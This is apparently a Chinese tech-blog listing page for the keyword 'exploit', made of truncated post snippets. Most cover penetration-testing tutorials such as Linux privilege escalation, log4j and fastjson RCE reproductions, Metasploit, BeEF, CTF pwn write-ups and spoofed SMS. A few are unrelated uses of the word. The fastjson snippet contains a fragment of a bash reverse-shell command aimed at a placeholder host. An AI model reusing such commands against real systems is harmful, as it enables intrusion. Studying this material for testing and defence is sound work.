exploit

Smart cancer nanomedicine 智慧型癌症纳米医学

AbstractNanomedicinesareextensivelyemployedincancertherapy.Wehereproposefourstrategicdirectionstoimprovenanomedicinetranslationandexploitation
Garfield_04ad·2023-12-27 18:38

TryHackMe-进攻性渗透测试-14_活动目录利用

ExploitingActiveDirectoryAD利用现在我们已经进行了内部侦察,并了解了有关AD结构和环境的土地布局,是时候进入开发阶段了。
Sugobet·2023-12-27 04:21

log4j2原理分析及漏洞复现- CVE-2021-44228

漏洞适用版本漏洞原理lookup功能jndi解析器jndi是什么ldap服务RMI0x03攻击过程0x04漏洞复现漏洞环境1.访问靶机2.dns回显验证3.将bash反弹shell命令编码备用4.使用JNDIExploit
zkzq·2023-12-25 13:32

Defi安全-Mono攻击事件分析--etherscan+phalcon

MonoX攻击事件相关信息在Ethereum和Polygon网络都发生了,攻击手段相同,以Ethereum为例进行分析:攻击者地址:MonoXFinanceExploiter|Address0xecbe385f78041895c311070f344b55bfaa953258
Emmanuel_scb·2023-12-25 12:27

如何修改Ubuntu内核版本?

问题来源:一个exploit的description信息Targetoffsetsareavailablefor:Ubuntu16.04kernels4.4.0Ubuntu,withLinux4.4.0
_invincible_·2023-12-25 08:17

权限提升-Linux脏牛内核漏洞&SUID&信息收集

一、Linux提权自动化脚本利用-4个脚本两个信息收集:LinEnum,linuxprivchecker两个漏洞探针:linux-exploit-suggesterlinux-exploit-suggester2
深白色耳机·2023-12-25 07:27

提权—Linux 脏牛内核漏洞&SUID&信息收集

1.Linux信息收集:Linux提权自动化脚本4个脚本(这几个项目都可以在github找到):两个信息收集:LinEnum,linuxprivchecker两个漏洞探针:linux-exploit-suggester
暮w光·2023-12-25 07:52

漏洞预警 - Linux DirtyPipe权限提升漏洞 CVE-2022-0847

漏洞预警-LinuxDirtyPipe权限提升漏洞CVE-2022-0847漏洞描述CVE-2022-0847-DirtyPipe-ExploitCVE-2022-0847是存在于Linux内核5.8及之后版本中的本地提权漏洞
super 硕·2023-12-25 07:22

第63天-权限提升-Linux 脏牛内核漏洞&SUID&信息收

pwd=tzn2提取码:tzn2演示案例:案例1-Linux提权自动化脚本利用-4个脚本两个信息收集:LinEnum,linuxprivchecker两个漏洞探针:linux-exploit-suggesterlinux-exploit-sugg
IsecNoob·2023-12-25 07:51

63权限提升-Linux脏牛内核漏洞&SUID&信息收集

今天讲到的方法是suid和内核漏洞案例一Linux提权自动化脚本利用-4个脚本两个信息收集:LinEnum、linuxprivchecker两个漏洞探针:linux-exploit-suggester、
上线之叁·2023-12-25 07:20

BeEF的基本操作

启动和运行BeEF启动和运行BeEF(TheBrowserExploitationFramework)是进行浏览器渗透测试的重要一步。
Kali与编程~·2023-12-20 02:10

BEFF目标选择与准备

BeEF(TheBrowserExploitationFramework)作为一个专注于浏览器渗透测试和漏洞利用的工具,需要有明确的目标选择策略。
Kali与编程~·2023-12-20 02:40

理解BeEF的架构

BeEF的组件和工作原理BeEF(TheBrowserExploitationFramework)是一款用于浏览器渗透测试和漏洞利用的强大工具。
Kali与编程~·2023-12-20 02:38

SMB Signing not required漏洞修复方法

nessusscan结果如下:DescriptionSigningisnotrequiredontheremoteSMBserver.Anunauthenticated,remoteattackercanexploitthistoconductman
Par@ish·2023-12-19 02:02

linux 内核提权

工具网站:https://www.exploit-db.com/?
主要是有趣·2023-12-18 23:46

初探栈溢出(下)

0x04漏洞利用作为脚本小子,先跑一下写好了的exploit脚本。打开HackSysEVDExploit.sln文件,直接在vs2019上编译即可。
网安星星·2023-12-17 17:29

渗透工具——kali中msf简介(以及MSF的基本使用方法)

msf专业术语:1.渗透攻击(Exploit)攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。2.攻击载荷(Payload)目标系统在被渗透攻击后而执行的代码。
小迪门生202·2023-12-17 05:43

ISP—BNR

PCA-BasedSpatiallyAdaptiveDenoisingofCFAImagesforSingle-SensorDigitalCamerasPSEUDOFOUR-CHANNELIMAGEDENOISINGFORNOISYCFARAWDATANoiseReductionforCFAImageSensorsExploitingHVSBehaviour
wtzhu_13·2023-12-16 10:39

msf基础使用

MSFmsfconsole常规用法终端输入msfconsole通过命令执行连接对方主机使用exploit/multi/script/web_delivery模块useexploit/multi/script
longersking·2023-12-16 02:49

AI学习笔记之——多臂老虎机(Multi-armed bandit)问题

1.探索-利用困境(Explore-Exploitdilemma)多臂老虎机是一个有多个拉杆的赌博机,每一个拉杆的中奖几率是不一样的,问题是:如何在有限
weixin_33962923·2023-12-15 21:21

强化学习笔记5:learning&planning, exploration&exploitation

1learning&planningLearning和Planning是序列决策的两个基本问题。在强化学习中,环境初始时是未知的,agent不知道环境如何工作,agent通过不断地与环境交互,逐渐改进策略。(learning过程)在plannning中,环境是已知的,我们被告知了整个环境的运作规则的详细信息。Agent能够计算出一个完美的模型,并且在不需要与环境进行任何交互的时候进行计算。Agen
UQI-LIUWJ·2023-12-15 21:48

Linux提权

Linux提权方法Linux和Windows一样,也有相对应的脚本进行漏洞扫描,但风险太高,容易把服务器提崩,建议不用https://github.com/InteliSecureLabs/Linux_Exploit_Suggesteruname
config_星辰·2023-12-15 14:23

CTF特训日记day1

首先详细阅读了一下这篇文章:https://roderickchan.github.io/zh-cn/2023-03-01-analysis-of-glibc-heap-exploitation-in-high-version
Ayakaaaa·2023-12-06 04:45

vulnhub靶机练习-Os-hackNos

0x01靶机简介Difficulty:EasytoIntermediateFlag:2FlagfirstuserAndsecondrootLearning:exploit|WebApplication|
Asson·2023-12-04 03:05

Error 403 No valid crumb was included in the request 报错解决 容器化jenkins关闭CSRF

Error403Novalidcrumbwasincludedintherequest原因实际上这是因为jenkins的防止跨站点请求伪造(PreventCrossSiteRequestForgeryexploits
tina_sprunt·2023-12-02 20:27

第五篇红队笔记-百靶精讲之LampSecurityCTF-SSH参数-hashcat密码破解-crackmapexec功能/协议

端口扫描Web渗透SQL手工注入SQLmap自动注入SSH参数补写获得初始系统shellrootedLampSecurityCTF5主机发现端口扫描web渗透-NanoCMS数据泄露利用谷歌nanocmsexploit
zgcadmin·2023-12-02 17:54

盘点 | 安全测试者偏爱的安全测试工具

无线类【点击领取】《工具安装包》免费分享1.Metasploit(免费)2003年,美国网络安全研究员兼开发者Moore启动了Metasploit项目,目的是创建一个开源平台,获取Exploit代码用于研究与开发
网络安全入门到进阶·2023-11-30 23:34

CVE-2016-1897/8 - FFMpeg vulnerability analysis

2019独角兽企业重金招聘Python工程师标准>>>Vulnerabilityexploitmethodsareasfollows:一共4个文件:comm.php(接收用的也可以用监听一个端口)code
weixin_34221112·2023-11-30 10:19

【bsauce读论文】KOOBE:Towards Facilitating Exploit Generation of Kernel Out-Of-Bounds-USENIX2020

摘要:目标:heapout-of-bounds(OOB)堆越界内存写漏洞。原因:a.不同的OOB有不同的漏洞能力;b.构造exp会用到很多syscall,是模块化的过程。成果:本文总结了linux堆OOB漏洞利用的挑战,实现了KOOBE分析框架。给定一个PoC,KOOBE自动分析OOB漏洞并使用符号化追踪来总结PoC的能力,提出新型能力导向型fuzzing来搜索含其他能力的路径,识别合适的targ
bsauce·2023-11-30 01:36

fastjson1.2.47RCE远程命令执行漏洞复现

fastjson&/dev/tcp/x.x.x.x/port0>&1"};Processpc=rt.exec(commands);pc.waitFor();}catch(Exceptione){}}}3.编译成Exploit.class
zyl404·2023-11-29 03:51

Python从配置文件取值

=None#Integer/Noneprefix="ST"#String/NonenumUnit=6#Integer/NonepaddingForNumUnicite=False#BOOLEANnumExploitantEmetteur
naruto2017·2023-11-28 22:31

3、MSF使用

漏洞对靶机执行溢出攻击二、后渗透模块meterpreter的使用一、利用ms17-010漏洞对靶机执行溢出攻击分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:useexploit
PT_silver·2023-11-26 10:17

学习笔记-OS - Exploits

OS-Exploits免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.大纲Linux系统漏洞提权原生软件提权系统配置提权sudosuid远程漏洞
C-haidragon·2023-11-25 23:13

X-RAY POC编写

EXP(Exploit)-漏洞利用EXP,Exploit中文意思是漏洞利用。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利用的
bboywxy8340·2023-11-25 13:03

内网渗透之Linux权限提升大法

文章目录内网渗透|Linux权限提升大法0x01前言0x02工具介绍1.traitor2.LinEnum3.linux-exploit-suggester.sh4.LinuxExploitSuggester25
gaynell·2023-11-25 00:02

linux反汇编教程,Linux 下使用 objdump 反汇编

对于一般只想让自己程序跑起来的程序员,这个命令没有更多意义,对于想进一步了解系统的程序员,应该掌握这种工具,至少你可以自己写写shellcode了,或者看看人家给的exploit中的shellcode是什么东西
木水生·2023-11-24 08:41

kali渗透-6 Exploitation – Low Hanging Fruits

简介这章开始我们会开始涉及渗透测试的的利用层面。和漏洞评估的主要不同是,漏洞评估中测试者识别漏洞(多数时间使用自动化扫描器)和提出如何减轻它们的建议。而渗透测试中测试者作为恶意攻击者并尝试利用检测到的漏洞,并得到最后的结果:整个系统的沦陷,内部网络访问,敏感数据泄露,以及其它。同时,要当心不要影响系统的可用性或者为真正的攻击者留下后门。之前的章节中,我们已经涉及了如何检测Web应用中的一些漏洞。这
jacobouchoioi·2023-11-23 18:27

2018-08-09

Nebula练习这是练习的地址:https://exploit-exercises.com/,第一次写这种文档,并且也就是菜鸟一枚,请各位看官多多指教,有哪里理解有问题,希望能够严厉指出,直击痛处。
疯子小sha·2023-11-22 18:39

Metasploit使用指南

文章目录工具说明安装方法命令讲解show命令search搜索命令use命令info命令show命令run、exploit命令使用方法升级使用模块代理使用工具说明MetasploitFramework(MSF
凌奢·2023-11-22 08:39

SCTF2021_Pwn_dataleak_WP

SCTF2021_dataleak_WP文章目录SCTF2021_dataleak_WP检查文件和保护ida查看ELF文件cJSON_PWNida查看libcjson.so利用思路exploit检查文件和保护
Benson233·2023-11-22 05:35

如何发送一条欺骗短信

启动BackTrack并启动SocialEngineeringToolkit(SET)让我们首先启动Backtrack5,然后导航到Applications->ExploitationTools->SocialEngineeringTools
13049047c237·2023-11-19 05:48

fastjson 1.2.47漏洞复现

fastjson1.2.47rce访问首页用fastjsonscan找到pocjava-jarJNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C"touch/tmp
网络安全彭于晏·2023-11-17 17:44

【kali】34 WEB渗透——扫描工具w3af_console

profiles模块4.http-settings模块5.misc-settings(杂项设置)模块6.target模块7.启动8.脚本w3af_console一、简介web扫描框架(开源、不断添加集成exploit
(∪.∪ )...zzz·2023-11-17 11:56

【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3

0x0002】简易Linux堆利用入门教程byarttnba3老生常谈,[GITHUBBLOGADDR](https://arttnba3.cn/2021/05/10/NOTE-0X05-GLIBC_HEAP-EXPLOIT
arttnba3·2023-11-17 05:20

白帽子讲web安全 笔记(一)

第一章我的安全世界观漏洞利用代码英文“exploit”(开发;剥削;利用),通过exploit实现网络攻击获取root权限是最常见的攻击模式。
秋水木华·2023-11-16 21:14

__builtin_expect(x,0)

abovewecanseebarcaseprecedesfoocase.Sincefoocaseisunlikely,andinstructionsofbararepushedtothepipeline,thrashingthepipelineisunlikely.ThisisagoodexploitationofamodernCPU
raidtest·2023-11-16 02:06

DFIL: Deepfake Incremental Learning by Exploiting Domain-invariant Forgery Clues

一、研究背景1.在大规模数据集上训练后,DeepfakeDetection模型通常可以准确识别已知方法生成的伪造图像。2.由于数据分布的差异,模型检测新技术生成的图片时准确率显著降低。3.亟需一种能够应对多种潜在伪造方法的检测模型。二、研究动机1.难以获取足够新增伪造方法样本,依赖少量样本更新特征分布会造成过拟合。2.伪造检测任务存在数据不平衡问题,新增伪造方法样本远少于已知伪造方法。3.对齐新旧
二苏旧局吖·2023-11-15 13:17

Patch Now and Attack Later - Exploiting S7 PLCs by Time-Of-Day Block(先打补丁后攻击——基于S7 PLC的TOD漏洞)

先打补丁后攻击——基于S7PLC的TOD漏洞一、摘要二、介绍(一)攻击方式及工具(二)PLC(1)PLC执行环境(2)PLC操作系统(3)用户程序(4)PLC周期时间(5)时间中断三、攻击建模四、实验评估五、总结一、摘要  工业控制系统(ICSs)体系结构由可编程逻辑控制器(PLC)组成,其中一端与工程站通信,另一端控制某个物理过程。在本文中,我们证明了一些PLC是脆弱的,并证明了利用正在PLC中
工控小白2021·2023-11-15 07:37

XCTF攻防世界 4-ReeHY-main-100 题解

经过分析,漏洞主要有:在create_exploit函数中的两个整型溢出漏洞,使chunk地址可以写到缓冲区的高地址处在delete_exploit函数中的doublefree漏洞,释放后没有清空指针经过
C0Lin·2023-11-14 23:58

HackTheBox-Starting Point--Tier 2---Base

CustomApplications、SourceCodeAnalysis、Authentication、Apache、PHP、Reconnaissance、WebSiteStructureDiscovery、SUDOExploitation
七天啊·2023-11-13 15:06
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他